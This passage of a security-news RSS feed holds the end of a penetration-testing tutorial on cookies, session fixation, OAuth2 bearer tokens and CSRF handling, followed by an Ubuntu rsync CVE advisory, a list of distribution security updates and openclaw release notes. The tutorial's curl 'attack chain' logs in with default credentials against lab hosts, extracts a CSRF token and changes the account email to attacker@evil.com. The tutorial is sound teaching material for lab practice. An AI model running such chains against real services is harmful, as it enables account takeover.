discarded. No fixation vulnerability.</p><p>If you see:</p><pre>&lt; Set-Cookie: PHPSESSID=attackercontrolledvalue; Path=/</pre><p>The server kept your value and attached it to the authenticated session. That is session fixation. The real confirmation step is to make an authenticated request using your crafted value and verify it succeeds — a new cookie in the login response is a signal, not the finding itself.</p><h3>OAuth2 Bearer Token Flow (Surface Level)</h3><p>OAuth2 is a delegation framework with several grant types. The one you encounter most often in lab environments is the Resource Owner Password Credentials grant — the client sends credentials directly and receives a token. Note that this grant type is discouraged in modern OAuth2 deployments in favor of the Authorization Code flow, but it appears regularly in older APIs and internal tooling.</p><pre># Step 1: Request an access token<br>RESPONSE=$(curl -s \<br>  -X POST \<br>  -H "Content-Type: application/x-www-form-urlencoded" \<br>  -d "grant_type=password&amp;username=admin&amp;password=password&amp;client_id=myapp" \<br>  http://127.0.0.1:8080/oauth/token)</pre><pre>echo $RESPONSE | python3 -m json.tool<br>ACCESS_TOKEN=$(echo $RESPONSE | python3 -c "import sys,json; print(json.load(sys.stdin)['access_token'])")<br>echo "Token: $ACCESS_TOKEN"</pre><pre>{<br>    "access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4iLCJleHAiOjk5OTk5OTk5OTl9.lab_token_demo",<br>    "token_type": "Bearer",<br>    "expires_in": 3600,<br>    "scope": "read write"<br>}<br>Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4iLCJleHAiOjk5OTk5OTk5OTl9.lab_token_demo</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*cGao_-pTH0l3RCEERIotjw.png"><figcaption>OAuth2 token request → JSON response → shell variable extraction in three commands. The token is now in $ACCESS_TOKEN and ready to travel in every Authorization: Bearer header for the rest of the session.</figcaption></figure><p>The token response gives you the token itself, its type, expiry in seconds, and the scopes it covers. Pipe through python3 -m json.tool to read it cleanly — raw token responses are a single line of JSON.</p><p><strong>Step 2: Use the access token:</strong></p><pre>curl -s \<br>  -H "Authorization: Bearer $ACCESS_TOKEN" \<br>  http://target.com/api/protected-resource</pre><p>Bearer tokens travel in the Authorization header — no cookie jar needed. Treat them like passwords: anyone holding the token can make authenticated requests as that user until it expires. Store them in a shell variable, not in a file on a shared system.</p><p>If a request returns 401 after previously working, the token has expired — the expires_in field in the token response tells you how long it is valid. Request a new one using the same credentials.</p><p>For testing purposes: check whether the token endpoint has rate limiting, whether expired tokens are actually rejected (some applications skip expiry validation), and whether the scope field is enforced server-side or just decorative.</p><h3>The Full Stateful Attack Chain</h3><p>Pulling it together on a real target. Login, confirm, extract CSRF token, act. This is the skeleton of every multi-step web attack workflow — the specific endpoints change, the pattern does not.</p><pre># 1. Login and capture session<br>curl -s -c jar.txt \<br>  -d "username=admin&amp;password=admin" \<br>  http://10.48.179.222/cookie.php</pre><pre>Login successful. Cookie set.</pre><pre># 2. Confirm authentication<br>curl -s -b jar.txt http://10.48.179.222/cookie.php | grep -i "welcome"</pre><pre>Welcome back, admin!</pre><pre># 3. Fetch CSRF token from settings form<br>CSRF=$(curl -s -b jar.txt http://127.0.0.1:8080/settings | \<br>  grep -oP '(?&lt;=name="csrf_token" value=")[^"]*')</pre><pre># 4. Submit action with CSRF token<br>curl -s -b jar.txt \<br>  -d "csrf_token=$CSRF&amp;email=attacker@evil.com" \<br>  <a href="http://127.0.0.1:8080/change-email">http://127.0.0.1:8080/change-email</a></pre><pre>Email updated successfully.<br>User: admin<br>New email: attacker@evil.com</pre><p>The same jar.txt threads through every step. One login, four commands, end-to-end authenticated action.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/831/1*T1xI6vNi_nBtn9TicAV9kg.png"><figcaption>Real-target login — -c jar.txt captures the session cookie from the THM machine's response.</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/791/1*Krhypm4pcTzbTjTqvO-WWA.png"><figcaption>One flag swap, -b instead of -c, and the session travels with the request. The server recognizes it and returns authenticated content.</figcaption></figure><p>The two articles on authentication together give you the complete workflow: identify the scheme, authenticate, capture the session, maintain it across requests, and handle CSRF tokens that protect state-changing endpoints. Every login-gated machine on THM/HTB uses some combination of these patterns.</p><p><em>Next: Article 7 — Header Manipulation: Bypasses, Probing, and the Security Audit Nobody Does</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=6a0653814a07" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/auth-mastery-part-2-sessions-cookies-and-staying-authenticated-6a0653814a07">Auth Mastery Part 2: Sessions, Cookies, and Staying Authenticated</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in rsync (Ubuntu)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3563461/unix-server/security-mehrere-probleme-in-rsync-ubuntu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563461/unix-server/security-mehrere-probleme-in-rsync-ubuntu/</guid>
<pubDate>Mon, 01 Jun 2026 17:00:53 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (.NET 10.0, .NET 9.0, firefox, flatpak, httpd, and thunderbird), Debian (chromium, corosync, cyborg, dovecot, exim4, git-lfs, imagemagick, kernel, keystone, linux-6.1, php-twig, python-aiohttp, sentry-python, swift, and symfony), Fedora (chromium, dj...]]></description>
<link>https://tsecurity.de/de/3563159/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563159/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 01 Jun 2026 15:09:32 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (.NET 10.0, .NET 9.0, firefox, flatpak, httpd, and thunderbird), <b>Debian</b> (chromium, corosync, cyborg, dovecot, exim4, git-lfs, imagemagick, kernel, keystone, linux-6.1, php-twig, python-aiohttp, sentry-python, swift, and symfony), <b>Fedora</b> (chromium, djvulibre, docker-compose, giflib, haveged, libsoup3, libssh2, mingw-objfw, netatalk, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, objfw, pdns, perl-Crypt-PasswdMD5, perl-libwww-perl, python-urllib3, suricata, and xrdp), <b>Mageia</b> (perl-Template-Toolkit and vim), <b>Oracle</b> (.NET 8.0, cockpit, firefox, flatpak, freerdp, kernel, and libexif), <b>Red Hat</b> (containernetworking-plugins, libsoup, libsoup3, multiple packages, php:8.2, php:8.3, podman, rhc, and skopeo), <b>SUSE</b> (amazon-ecs-init, amazon-ssm-agent, apptainer, azure-storage-azcopy, bind, chromium, csync2, cups, docker-stable, frr, gdk-pixbuf-loader-libheif, gnutls, hauler, helm, helm3, ignition, java-1_8_0-ibm, kernel, libBasicUsageEnvironment2, libredwg-devel, localsearch, memcached, openexr, perl-Net-CIDR-Lite, perl-YAML-Syck, postgresql14, python-mistune, python-pillow, python-pytest-html, python-urllib3, python311-Authlib, strongswan, trivy, vim, and xz), and <b>Ubuntu</b> (gdal, python-pip, qtwebengine-opensource-src, rsync, and texmaker).]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8349-1: rsync vulnerabilities]]></title>
<description><![CDATA[Calum Hutton discovered that rsync contained a heap-based out-of-bounds
read when handling file transfers. A remote attacker with read access
to an rsync server could possibly use this issue to cause a denial of
service. (CVE-2025-10158)

Batuhan Sancak, Damien Neil, and Michael Stapelberg discov...]]></description>
<link>https://tsecurity.de/de/3562738/unix-server/usn-8349-1-rsync-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562738/unix-server/usn-8349-1-rsync-vulnerabilities/</guid>
<pubDate>Mon, 01 Jun 2026 13:00:32 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Calum Hutton discovered that rsync contained a heap-based out-of-bounds
read when handling file transfers. A remote attacker with read access
to an rsync server could possibly use this issue to cause a denial of
service. (CVE-2025-10158)

Batuhan Sancak, Damien Neil, and Michael Stapelberg discovered that
rsync daemons configured without chroot protection were exposed to a
race condition on parent path components. A local attacker with write
access to a module could possibly use this issue to overwrite files,
obtain sensitive information, or escalate privileges.
(CVE-2026-29518)

It was discovered that rsync did not properly validate a length value
while sorting extended attributes. An attacker could possibly use this
issue to cause a denial of service. (CVE-2026-41035)

It was discovered that rsync performed reverse-DNS lookups after
chrooting in some daemon configurations. A remote attacker could
possibly use this issue to bypass hostname-based access controls and
access network services. (CVE-2026-43617)

Omar Elsayed discovered that rsync did not properly check for integer
overflows while decoding compressed tokens. A remote attacker could
possibly use this issue to obtain sensitive information.
(CVE-2026-43618)

Andrew Tridgell discovered that rsync did not fully fix a symlink race
condition in path-based system calls for daemons configured without
chroot protection. A local attacker could possibly use this issue to
overwrite files, obtain sensitive information, or escalate privileges.
(CVE-2026-43619)

Pratham Gupta discovered that rsync did not properly validate an index
while processing file lists. A remote attacker could possibly use this
issue to cause rsync to crash, resulting in a denial of service.
(CVE-2026-43620)

Michal Ruprich discovered that rsync contained an off-by-one error
while handling HTTP proxy responses. An attacker able to intercept network
communications or a malicious proxy server could possibly use this issue to
cause a denial of service. (CVE-2026-45232)]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.28-beta.2]]></title>
<description><![CDATA[2026.5.28
Highlights

Agent and Codex runtime recovery is steadier: subagents keep cwd/workspace separation, hook context stays prompt-local, session locks release on timeout abort, stale restart continuations are avoided, and Codex app-server/helper failures no longer tear down shared runtime st...]]></description>
<link>https://tsecurity.de/de/3556921/downloads/openclaw-2026528-beta2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556921/downloads/openclaw-2026528-beta2/</guid>
<pubDate>Fri, 29 May 2026 14:31:29 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.28</h2>
<h3>Highlights</h3>
<ul>
<li>Agent and Codex runtime recovery is steadier: subagents keep cwd/workspace separation, hook context stays prompt-local, session locks release on timeout abort, stale restart continuations are avoided, and Codex app-server/helper failures no longer tear down shared runtime state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4530733870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87218" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87218/hovercard" href="https://github.com/openclaw/openclaw/pull/87218">#87218</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523882966" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86875" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86875/hovercard" href="https://github.com/openclaw/openclaw/pull/86875">#86875</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535658120" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87409" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87409/hovercard" href="https://github.com/openclaw/openclaw/pull/87409">#87409</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535300059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87399" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87399/hovercard" href="https://github.com/openclaw/openclaw/pull/87399">#87399</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534684461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87375" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87375/hovercard" href="https://github.com/openclaw/openclaw/pull/87375">#87375</a>)</li>
<li>Channel delivery and session identity got safer across outbound plugin hooks, Matrix room ids, iMessage reactions/approvals, Slack final replies, Discord recovered tool warnings, WhatsApp profile auth roots, Telegram polling, and Microsoft Teams service URL trust checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345081037" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73706/hovercard" href="https://github.com/openclaw/openclaw/pull/73706">#73706</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364693778" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75670" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75670/hovercard" href="https://github.com/openclaw/openclaw/issues/75670">#75670</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534435733" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87366" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87366/hovercard" href="https://github.com/openclaw/openclaw/pull/87366">#87366</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536461472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87451" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87451/hovercard" href="https://github.com/openclaw/openclaw/pull/87451">#87451</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4533570288" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87334" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87334/hovercard" href="https://github.com/openclaw/openclaw/pull/87334">#87334</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4459071895" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82492" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82492/hovercard" href="https://github.com/openclaw/openclaw/pull/82492">#82492</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465217648" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83304" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83304/hovercard" href="https://github.com/openclaw/openclaw/pull/83304">#83304</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4529579598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87160" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87160/hovercard" href="https://github.com/openclaw/openclaw/pull/87160">#87160</a>)</li>
<li>Mobile and chat surfaces got a broader refresh: the iOS Pro UI, Gateway chat transport, onboarding, Talk permissions, WebChat reconnect delivery, and session picker behavior now preserve more state across reconnects and empty searches. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534475516" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87367" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87367/hovercard" href="https://github.com/openclaw/openclaw/pull/87367">#87367</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4537867197" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87531" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87531/hovercard" href="https://github.com/openclaw/openclaw/pull/87531">#87531</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541460557" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87682" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87682/hovercard" href="https://github.com/openclaw/openclaw/pull/87682">#87682</a>)</li>
<li>Browser, channel, and automation inputs are stricter: Browser tool timeouts, viewport/tab indices, Gateway ports, cron retry handling, Discord component ids, schema array refs, Telegram callback pages, and channel progress callbacks now reject malformed values earlier and preserve the intended delivery context. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462211584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82887" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82887/hovercard" href="https://github.com/openclaw/openclaw/pull/82887">#82887</a>)</li>
<li>Provider, media, and document coverage expands with Claude Opus 4.8, Fal Krea image schemas, NVIDIA featured models, MiniMax streaming music responses, encrypted PDF extraction, voice model catalogs, GitHub Copilot agent runtime support, and a Codex Supervisor plugin path for delegated Codex workflows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4545001692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87845" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87845/hovercard" href="https://github.com/openclaw/openclaw/pull/87845">#87845</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4545739723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87890" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87890/hovercard" href="https://github.com/openclaw/openclaw/pull/87890">#87890</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4424322077" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80775" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80775/hovercard" href="https://github.com/openclaw/openclaw/pull/80775">#80775</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4491159526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84764" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84764/hovercard" href="https://github.com/openclaw/openclaw/pull/84764">#84764</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542757246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87751" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87751/hovercard" href="https://github.com/openclaw/openclaw/pull/87751">#87751</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544160876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87794/hovercard" href="https://github.com/openclaw/openclaw/pull/87794">#87794</a>)</li>
<li>CLI, auth, doctor, and provider paths fail faster and recover more clearly: malformed numeric/version options are rejected, workspace dotenv provider credentials are ignored, OAuth and local service startup requests are bounded, legacy <code>api_key</code> auth profiles migrate to canonical form, and restart guidance is actionable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535278756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87398" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87398/hovercard" href="https://github.com/openclaw/openclaw/pull/87398">#87398</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4513750971" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86281" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86281/hovercard" href="https://github.com/openclaw/openclaw/pull/86281">#86281</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534263190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87361" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87361/hovercard" href="https://github.com/openclaw/openclaw/pull/87361">#87361</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4470260031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83655" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83655/hovercard" href="https://github.com/openclaw/openclaw/pull/83655">#83655</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4538477112" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87559" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87559/hovercard" href="https://github.com/openclaw/openclaw/pull/87559">#87559</a>)</li>
<li>Plugin and Gateway hot paths do less repeated work while preserving cache correctness for install records, config JSON parsing, tool search catalogs, session stores, manifest model rows, auto-enabled plugin config, browser tokens, and viewer assets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4520495731" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86699" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86699/hovercard" href="https://github.com/openclaw/openclaw/pull/86699">#86699</a>)</li>
<li>Release, QA, and E2E validation now bound more log, artifact, harness, and cross-OS waits so failing lanes produce proof instead of hanging or false-greening.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Status: show active subagent details in status output.</li>
<li>Diffs: split the default language pack and expand default Diffs language coverage while keeping the host floor aligned. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534535212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87370" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87370/hovercard" href="https://github.com/openclaw/openclaw/pull/87370">#87370</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534563692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87372" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87372/hovercard" href="https://github.com/openclaw/openclaw/pull/87372">#87372</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
<li>ClawHub: add plugin display names plus skill verification and trust surfaces. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534140530" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87354" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87354/hovercard" href="https://github.com/openclaw/openclaw/pull/87354">#87354</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4520495731" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86699" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86699/hovercard" href="https://github.com/openclaw/openclaw/pull/86699">#86699</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thewilloftheshadow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thewilloftheshadow">@thewilloftheshadow</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>.</li>
<li>iOS: refresh the dev app with Pro Command, Chat, Agents, and Settings tabs wired to gateway sessions, diagnostics, chat, and realtime Talk. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534475516" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87367" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87367/hovercard" href="https://github.com/openclaw/openclaw/pull/87367">#87367</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>Docs: clarify Codex computer-use setup, paste-token stdin auth setup, macOS gateway sleep troubleshooting, native Codex hook relay recovery, container model auth, install deployment cards, device-token admin gating, CLI setup flow compatibility, and backport targets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4533118068" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87313" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87313/hovercard" href="https://github.com/openclaw/openclaw/pull/87313">#87313</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223303633" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63050" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63050/hovercard" href="https://github.com/openclaw/openclaw/pull/63050">#63050</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541567603" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87685" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87685/hovercard" href="https://github.com/openclaw/openclaw/pull/87685">#87685</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bdjben/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bdjben">@bdjben</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liaoandi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liaoandi">@liaoandi</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thewilloftheshadow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thewilloftheshadow">@thewilloftheshadow</a>.</li>
<li>PDF/tools: use ClawPDF for PDF extraction, support encrypted PDF extraction, and surface MCP structured content in agent tool results. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541241418" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87670" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87670/hovercard" href="https://github.com/openclaw/openclaw/pull/87670">#87670</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542757246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87751" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87751/hovercard" href="https://github.com/openclaw/openclaw/pull/87751">#87751</a>)</li>
<li>Providers: add Claude Opus 4.8 support, Fal Krea image model schemas, NVIDIA featured model catalogs, MiniMax streaming music responses, and provider-backed voice model catalogs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4545001692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87845" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87845/hovercard" href="https://github.com/openclaw/openclaw/pull/87845">#87845</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4545739723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87890" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87890/hovercard" href="https://github.com/openclaw/openclaw/pull/87890">#87890</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4424322077" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80775" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80775/hovercard" href="https://github.com/openclaw/openclaw/pull/80775">#80775</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4491159526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84764" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84764/hovercard" href="https://github.com/openclaw/openclaw/pull/84764">#84764</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544160876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87794/hovercard" href="https://github.com/openclaw/openclaw/pull/87794">#87794</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex/GitHub: add the GitHub Copilot agent runtime and the Codex Supervisor plugin package.</li>
<li>Discord: show commentary in progress drafts so live Discord runs expose useful in-progress context. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499607477" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85200" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85200/hovercard" href="https://github.com/openclaw/openclaw/pull/85200">#85200</a>)</li>
<li>Plugin SDK: add a reply payload sending hook for plugins that need to deliver channel-owned replies and flatten package types for SDK declarations. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461890496" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82823" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82823/hovercard" href="https://github.com/openclaw/openclaw/pull/82823">#82823</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4529621686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87165" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87165/hovercard" href="https://github.com/openclaw/openclaw/pull/87165">#87165</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
